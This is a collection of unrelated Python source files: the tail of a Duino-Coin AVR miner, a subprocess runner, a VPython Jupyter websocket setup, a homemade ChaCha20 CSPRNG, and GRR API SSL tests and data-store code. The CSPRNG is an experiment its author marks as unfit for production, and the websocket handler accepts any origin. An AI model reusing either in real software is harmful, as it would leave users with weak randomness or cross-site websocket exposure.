+ str(ping))
break
except Exception as e:
pretty_print(
"net"
+ str(''.join(filter(str.isdigit, com))),
get_string("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (err parsing response: "
+ str(e)
+ ")",
"error")
debug_output("Error parsing response: "
+ str(e)
+ ", restarting miner")
sleep(1)
restart_miner()
if feedback == "GOOD":
# If result was correct
shares[0] += 1
title(
get_string("duco_avr_miner")
+ str(MINER_VER)
+ ") - "
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ get_string("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ " usb"
+ str(''.join(filter(str.isdigit, com)))
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ✓"
+ get_string("accepted")
+ Fore.RESET
+ str(int(shares[0]))
+ "/"
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ " ("
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%01.3f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ " H/s"
+ Style.NORMAL
+ Fore.RESET
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
shares[0] += 1
title(
get_string("duco_avr_miner")
+ str(MINER_VER)
+ ") - "
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ get_string("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ " usb"
+ str(''.join(filter(str.isdigit, com)))
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ✓"
+ get_string("block_found")
+ Fore.RESET
+ str(int(shares[0]))
+ "/"
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ " ("
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%01.3f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(int(hashrate))
+ " H/s"
+ Style.NORMAL
+ Fore.RESET
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
shares[1] += 1
title(
get_string("duco_avr_miner")
+ str(MINER_VER)
+ ") - "
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ get_string("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ " usb"
+ str(''.join(filter(str.isdigit, com)))
+ " "
+ Back.RESET
+ Fore.RED
+ " ✗"
+ get_string("rejected")
+ Fore.RESET
+ str(int(shares[0]))
+ "/"
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ " ("
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%01.3f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(int(hashrate))
+ " H/s"
+ Style.NORMAL
+ Fore.RESET
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
break
if __name__ == "__main__":
# Colorama
init(autoreset=True)
# Window title
title(get_string("duco_avr_miner") + str(MINER_VER) + ")")
try:
# Load config file or create new one
load_config()
debug_output("Config file loaded")
except Exception as e:
pretty_print(
"sys0",
get_string("load_config_error")
+ RESOURCES_DIR
+ get_string("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " ("
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
greeting()
debug_output("greeting displayed")
except Exception as e:
debug_output("Error displaying greeting message: " + str(e))
try:
# Start donation thread
donate()
except Exception as e:
debug_output("Error launching donation thread: " + str(e))
try:
# Launch avr duco mining threads
for port in avrport:
thrThread(
target=mine_avr,
args=(port,)).start()
except Exception as e:
debug_output("Error launching AVR thead(s): " + str(e))
try:
# Discord rich presence threads
init_rich_presence()
thrThread(
target=update_rich_presence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
ProcessRunner.py | import subprocess
from subprocess import Popen, PIPE
import errno
import signal
import threading
import time
import shlex
from mtm.ioc.Inject import Inject
from queue import Queue, Empty
class ResultType:
Success = 1
Error = 2
TimedOut = 3
class ProcessRunner:
_log = Inject('Logger')
def execNoWait(self, vals, startDir):
params = {}
if startDir != None:
params['cwd'] = startDir
Popen(vals, **params)
def waitForProcessOrTimeout(self, commandVals, seconds, startDir = None):
params = {}
params['stdout'] = subprocess.PIPE
params['stderr'] = subprocess.STDOUT
if startDir != None:
params['cwd'] = startDir
proc = Popen(commandVals, **params)
# TODO - clean this up so there's only one thread, then
# do the timeout logic on the main thread
timeout = KillProcessThread(seconds, proc.pid)
timeout.run()
def enqueueOutput(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
# We use a queue here instead of just calling stdout.readline() on the main thread
# so that we can catch the KeyboardInterrupt event, and force kill the process
queue = Queue()
thread = threading.Thread(target = enqueueOutput, args = (proc.stdout, queue))
thread.daemon = True # thread dies with the program
thread.start()
while True:
try:
try:
line = queue.get_nowait()
self._log.debug(line.decode('utf-8').rstrip())
except Empty:
if not thread.isAlive():
break
time.sleep(0.2)
except KeyboardInterrupt as e:
self._log.error("Detected KeyboardInterrupt - killing process...")
timeout.forceKill()
raise e
resultCode = proc.wait()
timeout.cancel()
if timeout.timeOutOccurred:
return ResultType.TimedOut
if resultCode != 0:
return ResultType.Error
return ResultType.Success
# Note that in this case we pass the command as a string
# This is recommended by the python docs here when using shell = True
# https://docs.python.org/2/library/subprocess.html#subprocess.Popen
def execShellCommand(self, commandStr, startDir = None):
params = {}
params['stdout'] = subprocess.PIPE
params['stderr'] = subprocess.PIPE
params['shell'] = True
if startDir != None:
params['cwd'] = startDir
# Would be nice to get back output in real time but I can't figure
# out a way to do this
# This method should only be used for a few command-prompt specific
# commands anyway so not a big loss
proc = Popen(commandStr, **params)
(stdoutData, stderrData) = proc.communicate()
output = stdoutData.decode('utf-8').strip()
errors = stderrData.decode('utf-8').strip()
if output:
for line in output.split('\n'):
self._log.debug(line)
if errors:
self._log.error('Error occurred during command "{0}":'.format(commandStr))
for line in errors.split('\n'):
self._log.error(' ' + line)
exitStatus = proc.returncode
if exitStatus != 0:
return ResultType.Error
return ResultType.Success
class KillProcessThread:
def __init__(self, seconds, pid):
self.pid = pid
self.timeOutOccurred = False
self.seconds = seconds
self.cond = threading.Condition()
self.cancelled = False
self.thread = threading.Thread(target=self.wait)
# Setting daemon to true will kill the thread if the main
# thread aborts (eg. user hitting ctrl+c)
self.thread.daemon = True
def run(self):
'''Begin the timeout.'''
self.thread.start()
def wait(self):
with self.cond:
self.cond.wait(self.seconds)
if not self.cancelled:
self.forceKill()
def cancel(self):
'''Cancel the timeout, if it hasn't yet occured.'''
with self.cond:
self.cancelled = True
self.cond.notify()
self.thread.join()
def forceKill(self):
self.timeOutOccurred = True
try:
commandVals = shlex.split('taskkill /f /pid %i' % self.pid)
Popen(commandVals, stdout=PIPE, stderr=PIPE)
except OSError as e:
# If the process is already gone, ignore the error.
if e.errno not in (errno.EPERM, errno. ESRCH):
raise e
|
with_notebook.py | import os
import time
from threading import Thread
from jupyter_core.paths import jupyter_data_dir
import notebook
import IPython
from IPython.display import display, Javascript
from .vpython import GlowWidget, baseObj, canvas
from .rate_control import ws_queue
from . import __version__
import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web
import socket
import json
import asyncio
import logging
def find_free_port():
s = socket.socket()
s.bind(('',0)) # find an available port
return s.getsockname()[1]
__SOCKET_PORT = find_free_port()
try:
if platform.python_implementation() == 'PyPy':
__SOCKET_PORT = 9000 + __SOCKET_PORT % 1000 # use port number between 9000 and 9999 for PyPy
except:
pass
#### Setup for Jupyter VPython
# The following file operations check whether nbextensions already has the correct files.
package_dir = os.path.dirname(__file__) # The location in site-packages of the vpython module
datacnt = len(os.listdir(package_dir+"/vpython_data")) # the number of files in the site-packages vpython data folder
libcnt = len(os.listdir(package_dir+"/vpython_libraries")) # the number of files in the site-packages vpython libraries folder
jd = jupyter_data_dir()
nbdir = jd+'/nbextensions/'
nbdata = nbdir+'vpython_data'
nblib = nbdir+'vpython_libraries'
transfer = True # need to transfer files from site-packages to nbextensions
### If JupyterLab is installed then copy vpython_data directory to static dir in Jupytarlab Application Directory
try:
import jupyterlab
import jupyterlab.commands
except ImportError:
#logging.info("Unable to import jupyterlab")
pass
else:
# We have jupyterlab, is it the right version?
if jupyterlab.__version__ >= '0.35.0':
from os.path import join
labextensions_dir = join(jupyterlab.commands.get_app_dir(), u'static')
notebook.nbextensions.install_nbextension(path=package_dir + "/vpython_data",
nbextensions_dir=labextensions_dir,
overwrite=False,
verbose=0)
else:
print("Must have at least version 0.35 of JupyterLab")
if 'nbextensions' in os.listdir(jd):
ldir = os.listdir(nbdir)
if ('vpython_data' in ldir and len(os.listdir(nbdata)) == datacnt and
'vpython_libraries' in ldir and len(os.listdir(nblib)) == libcnt and
'vpython_version.txt' in ldir):
v = open(nbdir+'/vpython_version.txt').read()
transfer = (v != __version__) # need not transfer files to nbextensions if correct version's files already there
if transfer:
notebook.nbextensions.install_nbextension(path = package_dir+"/vpython_data",overwrite = True,user = True,verbose = 0)
notebook.nbextensions.install_nbextension(path = package_dir+"/vpython_libraries",overwrite = True,user = True,verbose = 0)
# Wait for files to be transferred to nbextensions:
libready = False
dataready = False
while True:
nb = os.listdir(nbdir)
for f in nb:
if f == 'vpython_data':
if len(os.listdir(nbdata)) == datacnt:
dataready = True
if f == 'vpython_libraries':
if len(os.listdir(nblib)) == libcnt:
libready = True
if libready and dataready: break
# Mark with the version number that the files have been transferred successfully:
fd = open(nbdir+'/vpython_version.txt', 'w')
fd.write(__version__)
fd.close()
display(Javascript("""if (typeof Jupyter !== "undefined") {require.undef("nbextensions/vpython_libraries/glow.min");}else{element.textContent = ' ';}"""))
display(Javascript("""if (typeof Jupyter !== "undefined") {require.undef("nbextensions/vpython_libraries/glowcomm");}else{element.textContent = ' ';}"""))
display(Javascript("""if (typeof Jupyter !== "undefined") {require.undef("nbextensions/vpython_libraries/jquery-ui.custom.min");}else{element.textContent = ' ';}"""))
display(Javascript("""if (typeof Jupyter !== "undefined") {require(["nbextensions/vpython_libraries/glow.min"], function(){console.log("GLOW LOADED");});}else{element.textContent = ' ';}"""))
display(Javascript("""if (typeof Jupyter !== "undefined") {require(["nbextensions/vpython_libraries/glowcomm"], function(){console.log("GLOWCOMM LOADED");});}else{element.textContent = ' ';}"""))
display(Javascript("""if (typeof Jupyter !== "undefined") {require(["nbextensions/vpython_libraries/jquery-ui.custom.min"], function(){console.log("JQUERY LOADED");});}else{element.textContent = ' ';}"""))
time.sleep(1) # allow some time for javascript code above to run before attempting to setup Comm Channel
wsConnected = False
class WSHandler(tornado.websocket.WebSocketHandler):
def open(self):
global wsConnected
wsConnected = True
def on_message(self, message):
ws_queue.put(message)
def on_close(self):
self.stop_tornado()
def stop_tornado(self):
ioloop = tornado.ioloop.IOLoop.instance()
ioloop.add_callback(ioloop.stop)
def check_origin(self, origin):
return True
def start_server():
asyncio.set_event_loop(asyncio.new_event_loop())
application = tornado.web.Application([(r'/ws', WSHandler),])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(__SOCKET_PORT)
Log = logging.getLogger('tornado.access')
level = logging.getLevelName('WARN')
Log.setLevel(level)
tornado.ioloop.IOLoop.instance().start()
# Removed check for ipykernel version because the old check
# was for 5.0.0 but this works with 4.x too...and 4.x is the first
# version of ipykernel
t = Thread(target=start_server, args=())
t.start()
# Setup Comm Channel and websocket
baseObj.glow = GlowWidget(wsport=__SOCKET_PORT, wsuri='/ws')
while (not wsConnected):
time.sleep(0.1) # wait for websocket to connect
baseObj.trigger() # start the trigger ping-pong process
# Same justification as above for removing the ipykernel check.
# There was also an IPython version check for >=4, which was
# released in Nov 2015. Ok to stop supporting in 2.019 I think.
async def wsperiodic():
while True:
if ws_queue.qsize() > 0:
data = ws_queue.get()
d = json.loads(data)
# Must send events one at a time to GW.handle_msg because
# bound events need the loop code
for m in d:
# message format used by notebook
msg = {'content': {'data': [m]}}
baseObj.glow.handle_msg(msg)
await asyncio.sleep(0)
loop = asyncio.get_event_loop()
loop.create_task(wsperiodic())
# Dummy name to import...
_ = None
|
csprng.py | #!/usr/bin/env python3
#
# Playing around with creating a CSPRNG
#
# *DO NOT* use this in production for anything that matters
#
# Copyright (c) 2020, Ben Tasker
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# Neither the name of Ben Tasker nor the names of his
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
######################################################################################
from Crypto.Cipher import ChaCha20
from threading import Thread
from queue import Queue
import time
import os
import sys
### Config section
# This is based on the mitigations deployed in Amazon's S2N - https://aws.amazon.com/blogs/opensource/better-random-number-generation-for-openssl-libc-and-linux-mainline/
#
# Mix a little randomness into each number (so that if we somehow end up with different threads running with the same seed we still get different results, preventing leakage between public and private contexts)
#
# Amazon use RDRAND - that's a tad tricky when you're tinkering with this on a Pi that doesn't have that instruction.
#
# Enabling this means that you'll no longer be generating deterministic output
prediction_resistant=False
# Bytes can be pulled out via pipe - this defines where that FIFO is created
pipe_name="/tmp/csprng"
# How often should we try to re-seed?
reseed_interval=0.2
# This is created by another of my scripts. Could also be /dev/random
seed_source="/tmp/randentropy"
# How many threads should we have generating random numbers?
rng_threads=2
### RNG Related functions
def ChaChaMe(key,nonce,plaintext):
'''
Take a key and a "plaintext" (which in this case is probably a string of random bytes)
ChaCha20 them and return
'''
cipher=ChaCha20.new(key=key,nonce=nonce)
return cipher.encrypt(plaintext)
def iterate_with(key,plaintext,itercount,prediction_resistant,spare):
'''
Iteratively reencrypt a keyset with itself - itercount iterations
'''
buffer1 = []
# To help reduce the efficiency of backtracking, we'll mutate the key 1/2 way through
mutate_point = int(itercount/2)
# 48 iterations
for i in range(1,itercount):
# Use counter-mode to generate our nonce for each encryption
#
# When this iteration loop is next called, the key will have changed
nonce=format(i,'012').encode('utf-8')
if prediction_resistant:
plaintext = mix_with_rand(plaintext)
# If for some reason our key is < 32 bytes then skip
#
# This shouldn't but might happen as the result of a mutate,
# or because prediction_resistance has given us too few bytes back
if len(key) < 32:
continue
# Trigger the encryption
plaintext = ChaChaMe(key,nonce,plaintext)
if i == mutate_point and spare:
# Mutate the key using some of the "spare" data from the last key generation round
newkey = xor_bytes(key,spare[32:])
del key
del spare
key = newkey
del newkey
buffer1.append(plaintext)
return buffer1, plaintext
def mix_with_rand(plaintext):
'''
Take the input bytes and mix with data from a new random source
'''
randbytes = bytefetch(32)
return xor_bytes(randbytes,plaintext)
def split_seed(randbytes):
'''
Split our 512 bit bytestring into a key and a seed input
Could we stretch this out further by using all of randbytes as the seed? Feels like
it might be dangerous to multi-use the first 32 bytes, but I can't _quite_ rationalise why.
I guess we'd need to trim the bytes in rng_thread when deriving a new key too
'''
return randbytes[0:32],randbytes
def xor_bytes(b1,b2):
''' Run a bitwise XOR on two sets of bytes
'''
return bytes([a ^ b for a,b in zip(b1,b2)])
def select_key_from_bytes(inputbytes1,inputbytes2):
'''
Take 2 sets of generated bytes, select 32 bytes from them to be used in the next key
'''
b1,b1spare = split_seed(inputbytes1)
b2,b2spare = split_seed(inputbytes2)
# Combine them to create a new key
key=xor_bytes(b1,b2)
# Combine the "spare" bytes too
#
# these will get used later to mutate the key to help prevent backtracking
# that's a TODO though.
spare=xor_bytes(b1spare,b2spare)
return key,spare
def rng_thread(initial_seed,seed_queue,data_queue,reseed_interval):
'''
The RNG thread - this is where the numbers are actually generated
'''
key,plaintext=split_seed(initial_seed)
start=time.time()
spare=False
while True:
# Set off the initial iteration (48 iterations)
buffer1, plaintext = iterate_with(key,plaintext,48,prediction_resistant,spare)
# Clear the original and then use the first 2 entries to create the next key
del key
key,spare=select_key_from_bytes(buffer1[0],buffer1[1])
# Clear some space on the queue if necessary
if data_queue.full():
d = data_queue.get()
del d
# use the rest of the chain as our bytes
# we did 48 iterations, and are using 2 for a key, leaving
# 46 * 64bytes being pushed into the queue
data_queue.put(b"".join(buffer1[2:-1]))
# Next plaintext is the last block
plaintext=buffer1[-1]
# Clear the old one out
del buffer1
if (time.time() - start) > reseed_interval and seed_queue.qsize() > 0:
try:
newseed = seed_queue.get(True,0.1)
if newseed:
key,plaintext = split_seed(newseed)
start = time.time()
except:
print("{} unable to read a seed".format(time.time()))
pass
### Pipe/Output related functions
def reader_thread(q,pipe):
'''
Read random data in from the queue and write it out to the pipe
This will obviously block whenever there's no consumer connected to the pipe
'''
if not os.path.exists(pipe):
os.mkfifo(pipe)
pipeout = os.open(pipe, os.O_WRONLY)
while True:
if not pipeout:
try:
# If something failed, re-open the pipe
pipeout = os.open(pipe, os.O_WRONLY)
except:
print("{} Failed to open pipe".format(time.time()))
time.sleep(0.2)
continue
# Pull some random data off the queue
mixed = q.get()
if not mixed:
# Don't try and write if we haven't got anything
time.sleep(0.2)
continue
# Now try and write it to the pipe (here is where we'll block)
try:
os.write(pipeout, mixed)
except Exception as e:
#print(e)
try:
# Something went wrong, lets not litter the place with filehandles
os.close(pipeout)
except:
# The client probably went away, in which case os.close will have thrown "Bad File Descriptor"
pipeout=False
continue
### Seed Fetcher
def get_random_seed(seed_source):
'''
Fetch random bytes to be used as a seed
This function will block if the source isn't able to provide sufficient bytes.
That's sort of deliberate, but should probably handle it a bit more cleanly
'''
try:
f = os.open(seed_source,os.O_RDONLY)
bstring = os.read(f,64) # Read out 512 bits
os.close(f)
return bstring
except:
return False
def seeder_thread(seed_queue,seed_interval,seed_source):
'''
Fetch a seed value and push it onto the seed queue periodically
'''
pause = seed_interval / 2
while True:
data = get_random_seed(seed_source)
if data:
if seed_queue.full():
d = seed_queue.get()
del d
seed_queue.put(data)
time.sleep(pause)
### Main
# New seed data will get pushed to a queue
seed_queue=Queue(rng_threads*2)
# Generated random bytes will also find their way onto a queue
data_queue=Queue(rng_threads*100)
# If prediction resistance is enabled, try and enable RDRAND. Fall back on `get_random_bytes` if not
if prediction_resistant:
fail=False
try:
import rdrand
except:
fail=True
if not fail and rdrand.HAS_RAND:
bytefetch = rdrand.rdrand_get_bytes
else:
from Crypto.Random import get_random_bytes
bytefetch = get_random_bytes
print("WARN: Using Crypto.Random instead of RDRAND for prediction resistance - this is insecure")
# Get our initial seed
randomdata = get_random_seed(seed_source)
if not randomdata:
print("Error - failed to fetch intial seed")
sys.exit(1)
# Create the reader thread and seeder threads
readthread = Thread(target=reader_thread,args=(data_queue,pipe_name))
seedthread = Thread(target=seeder_thread,args=(seed_queue,reseed_interval,seed_source))
# Create the RNG threads
threads=[]
for i in range(0,rng_threads):
# Each should be started with a different seed
randomdata = get_random_seed(seed_source)
threads.append(Thread(target=rng_thread,args=(randomdata,seed_queue,data_queue,reseed_interval)))
threads[i].start()
print("Starting")
readthread.start()
seedthread.start()
readthread.join()
seedthread.join()
|
ssl_test.py | #!/usr/bin/env python
"""Tests for API client + HTTPS server integration."""
import datetime
import io
import os
import socket
import SocketServer
import threading
from cryptography import x509
from cryptography.hazmat import backends
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.x509 import oid
from http import server as http_server
import portpicker
import requests
from grr_api_client import api as grr_api
from grr_response_core.lib import flags
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_server.flows.general import processes
from grr_response_server.gui import api_auth_manager
from grr_response_server.gui import webauth
from grr_response_server.gui import wsgiapp_testlib
from grr.test_lib import acl_test_lib
from grr.test_lib import fixture_test_lib
from grr.test_lib import test_lib
class ApiSslServerTestBase(test_lib.GRRBaseTest, acl_test_lib.AclTestMixin):
def setUp(self):
super(ApiSslServerTestBase, self).setUp()
key = rdf_crypto.RSAPrivateKey.GenerateKey()
key_path = os.path.join(self.temp_dir, "key.pem")
with open(key_path, "wb") as f:
f.write(key.AsPEM())
subject = issuer = x509.Name([
x509.NameAttribute(oid.NameOID.COMMON_NAME, u"localhost"),
])
cert = x509.CertificateBuilder().subject_name(subject).issuer_name(
issuer).public_key(key.GetPublicKey().GetRawPublicKey()).serial_number(
x509.random_serial_number()).not_valid_before(
datetime.datetime.utcnow()).not_valid_after(
datetime.datetime.utcnow() +
datetime.timedelta(days=1)).add_extension(
x509.SubjectAlternativeName(
[x509.DNSName(u"localhost")]),
critical=False,
).sign(key.GetRawPrivateKey(), hashes.SHA256(),
backends.default_backend())
self.cert_path = os.path.join(self.temp_dir, "certificate.pem")
with open(self.cert_path, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
self.config_overrider = test_lib.ConfigOverrider({
"AdminUI.enable_ssl": True,
"AdminUI.ssl_key_file": key_path,
"AdminUI.ssl_cert_file": self.cert_path,
})
self.config_overrider.Start()
self.port = portpicker.PickUnusedPort()
self.thread = wsgiapp_testlib.ServerThread(self.port)
self.thread.StartAndWaitUntilServing()
api_auth_manager.APIACLInit.InitApiAuthManager()
self.token.username = "api_test_robot_user"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
self.endpoint = "https://localhost:%s" % self.port
def tearDown(self):
super(ApiSslServerTestBase, self).tearDown()
self.config_overrider.Stop()
self.thread.keep_running = False
class ApiSslE2ETestMixin(object):
def testGetClientWorks(self):
# By testing GetClient we test a simple GET method.
client_urn = self.SetupClient(0)
c = self.api.Client(client_id=client_urn.Basename()).Get()
self.assertEqual(c.client_id, client_urn.Basename())
def testSearchClientWorks(self):
# By testing SearchClients we test an iterator-based API method.
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testPostMethodWorks(self):
client_urn = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
client_ref = self.api.Client(client_id=client_urn.Basename())
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
self.assertTrue(result_flow.client_id)
def testDownloadingFileWorks(self):
client_urn = self.SetupClient(0)
fixture_test_lib.ClientFixture(client_urn, self.token)
out = io.BytesIO()
self.api.Client(client_id=client_urn.Basename()).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertTrue(out.getvalue())
class ApiSslWithoutCABundleTest(ApiSslServerTestBase):
def testConnectionFails(self):
client_urn = self.SetupClient(0)
api = grr_api.InitHttp(api_endpoint=self.endpoint)
with self.assertRaises(requests.exceptions.SSLError):
api.Client(client_id=client_urn.Basename()).Get()
class ApiSslWithEnvVarWithoutMergingTest(ApiSslServerTestBase):
def testConnectionFails(self):
client_urn = self.SetupClient(0)
api = grr_api.InitHttp(api_endpoint=self.endpoint, trust_env=False)
with self.assertRaises(requests.exceptions.SSLError):
api.Client(client_id=client_urn.Basename()).Get()
class ApiSslWithConfigurationInEnvVarsE2ETest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithConfigurationInEnvVarsE2ETest, self).setUp()
self.prev_environ = dict(os.environ)
os.environ["REQUESTS_CA_BUNDLE"] = self.cert_path
self.api = grr_api.InitHttp(api_endpoint=self.endpoint)
def tearDown(self):
super(ApiSslWithConfigurationInEnvVarsE2ETest, self).tearDown()
os.environ.clear()
os.environ.update(self.prev_environ)
class ApiSslWithWithVerifyFalseE2ETest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithWithVerifyFalseE2ETest, self).setUp()
self.api = grr_api.InitHttp(api_endpoint=self.endpoint, verify=False)
class ApiSslWithWithVerifyPointingToCABundleTest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithWithVerifyPointingToCABundleTest, self).setUp()
self.api = grr_api.InitHttp(
api_endpoint=self.endpoint, verify=self.cert_path)
class Proxy(http_server.SimpleHTTPRequestHandler):
requests = []
def do_CONNECT(self): # pylint: disable=invalid-name
self.__class__.requests.append(self.requestline)
class TCPServerV6(SocketServer.TCPServer):
address_family = socket.AF_INET6
class ApiSslProxyTest(ApiSslServerTestBase):
def setUp(self):
super(ApiSslProxyTest, self).setUp()
self.proxy_port = portpicker.PickUnusedPort()
self.proxy_server = TCPServerV6(("::", self.proxy_port), Proxy)
threading.Thread(target=self.proxy_server.serve_forever).start()
def tearDown(self):
super(ApiSslProxyTest, self).tearDown()
self.proxy_server.shutdown()
self.proxy_server.server_close()
def testProxyConnection(self):
client_urn = self.SetupClient(0)
api = grr_api.InitHttp(
api_endpoint=self.endpoint,
proxies={"https": "localhost:%d" % self.proxy_port})
with self.assertRaises(requests.exceptions.ConnectionError):
api.Client(client_id=client_urn.Basename()).Get()
# CONNECT request should point to GRR SSL server.
self.assertEqual(Proxy.requests,
["CONNECT localhost:%d HTTP/1.0" % self.port])
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
data_store.py | #!/usr/bin/env python
"""The main data store abstraction.
The data store is responsible for storing AFF4 objects permanently. This file
defines the basic interface of the data store, but there is no specific
implementation. Concrete implementations should extend the DataStore class and
provide non-abstract methods.
The data store is essentially an object store. Objects have a subject (a unique
identifying name) and a series of arbitrary attributes. Attributes also have a
name and can only store a number of well defined types.
Some data stores have internal capability to filter and search for objects based
on attribute conditions. Due to the variability of this capability in
implementations, the Filter() class is defined inside the DataStore class
itself. This allows callers to create a data store specific filter
implementation, with no prior knowledge of the concrete implementation.
In order to accommodate for the data store's basic filtering capabilities it is
important to allow the data store to store attribute values using the most
appropriate types.
The currently supported data store storage types are:
- Integer
- Bytes
- String (unicode object).
This means that if one stores an attribute containing an integer, and then
retrieves this attribute, the data store guarantees that an integer is
returned (although it may be stored internally as something else).
More complex types should be encoded into bytes and stored in the data store as
bytes. The data store can then treat the type as an opaque type (and will not be
able to filter it directly).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import abc
import atexit
import collections
import logging
import random
import sys
import time
from absl import flags
from future.builtins import str
from future.utils import iteritems
from future.utils import iterkeys
from future.utils import with_metaclass
from typing import Optional
from typing import Text
from grr_response_core import config
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import registry
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.util import collection
from grr_response_core.lib.util import precondition
from grr_response_core.stats import stats_collector_instance
from grr_response_core.stats import stats_utils
from grr_response_server import access_control
from grr_response_server import blob_store
from grr_response_server import db
from grr_response_server.databases import registry_init
from grr_response_server.rdfvalues import flow_runner as rdf_flow_runner
flags.DEFINE_bool("list_storage", False, "List all storage subsystems present.")
# TODO(user): Move access to functions that never return None but raise
# instead.
# A global data store handle
DB = None # type: Optional[DataStore]
# The global relational db handle.
REL_DB = None # type: Optional[db.Database]
# The global blobstore handle.
BLOBS = None # type: Optional[blob_store.BlobStore]
def RelationalDBWriteEnabled():
"""Returns True if write to a relational database are enabled."""
return bool(REL_DB)
def RelationalDBReadEnabled(category=None):
"""Returns True if reads from a relational database are enabled.
Args:
category: string identifying the category. Useful when a large piece of
functionality gets converted to REL_DB iteratively, step by step and when
enabling already implemented steps may break the rest of the system. For
example - reading single approvals is implemented, but listing them is
not.
Returns:
True if reads are enabled, False otherwise.
"""
flag = config.CONFIG["Database.useForReads"]
if category:
return flag and config.CONFIG["Database.useForReads.%s" % category]
return flag
def RelationalDBFlowsEnabled():
"""Returns True if relational flows are enabled.
Even with RelationalDBReadEnabled() returning True, this can be False.
Returns: True if relational flows are enabled.
"""
return config.CONFIG["Database.useRelationalFlows"]
def AFF4Enabled():
return config.CONFIG["Database.aff4_enabled"]
# There are stub methods that don't return/yield as indicated by the docstring.
# pylint: disable=g-doc-return-or-yield
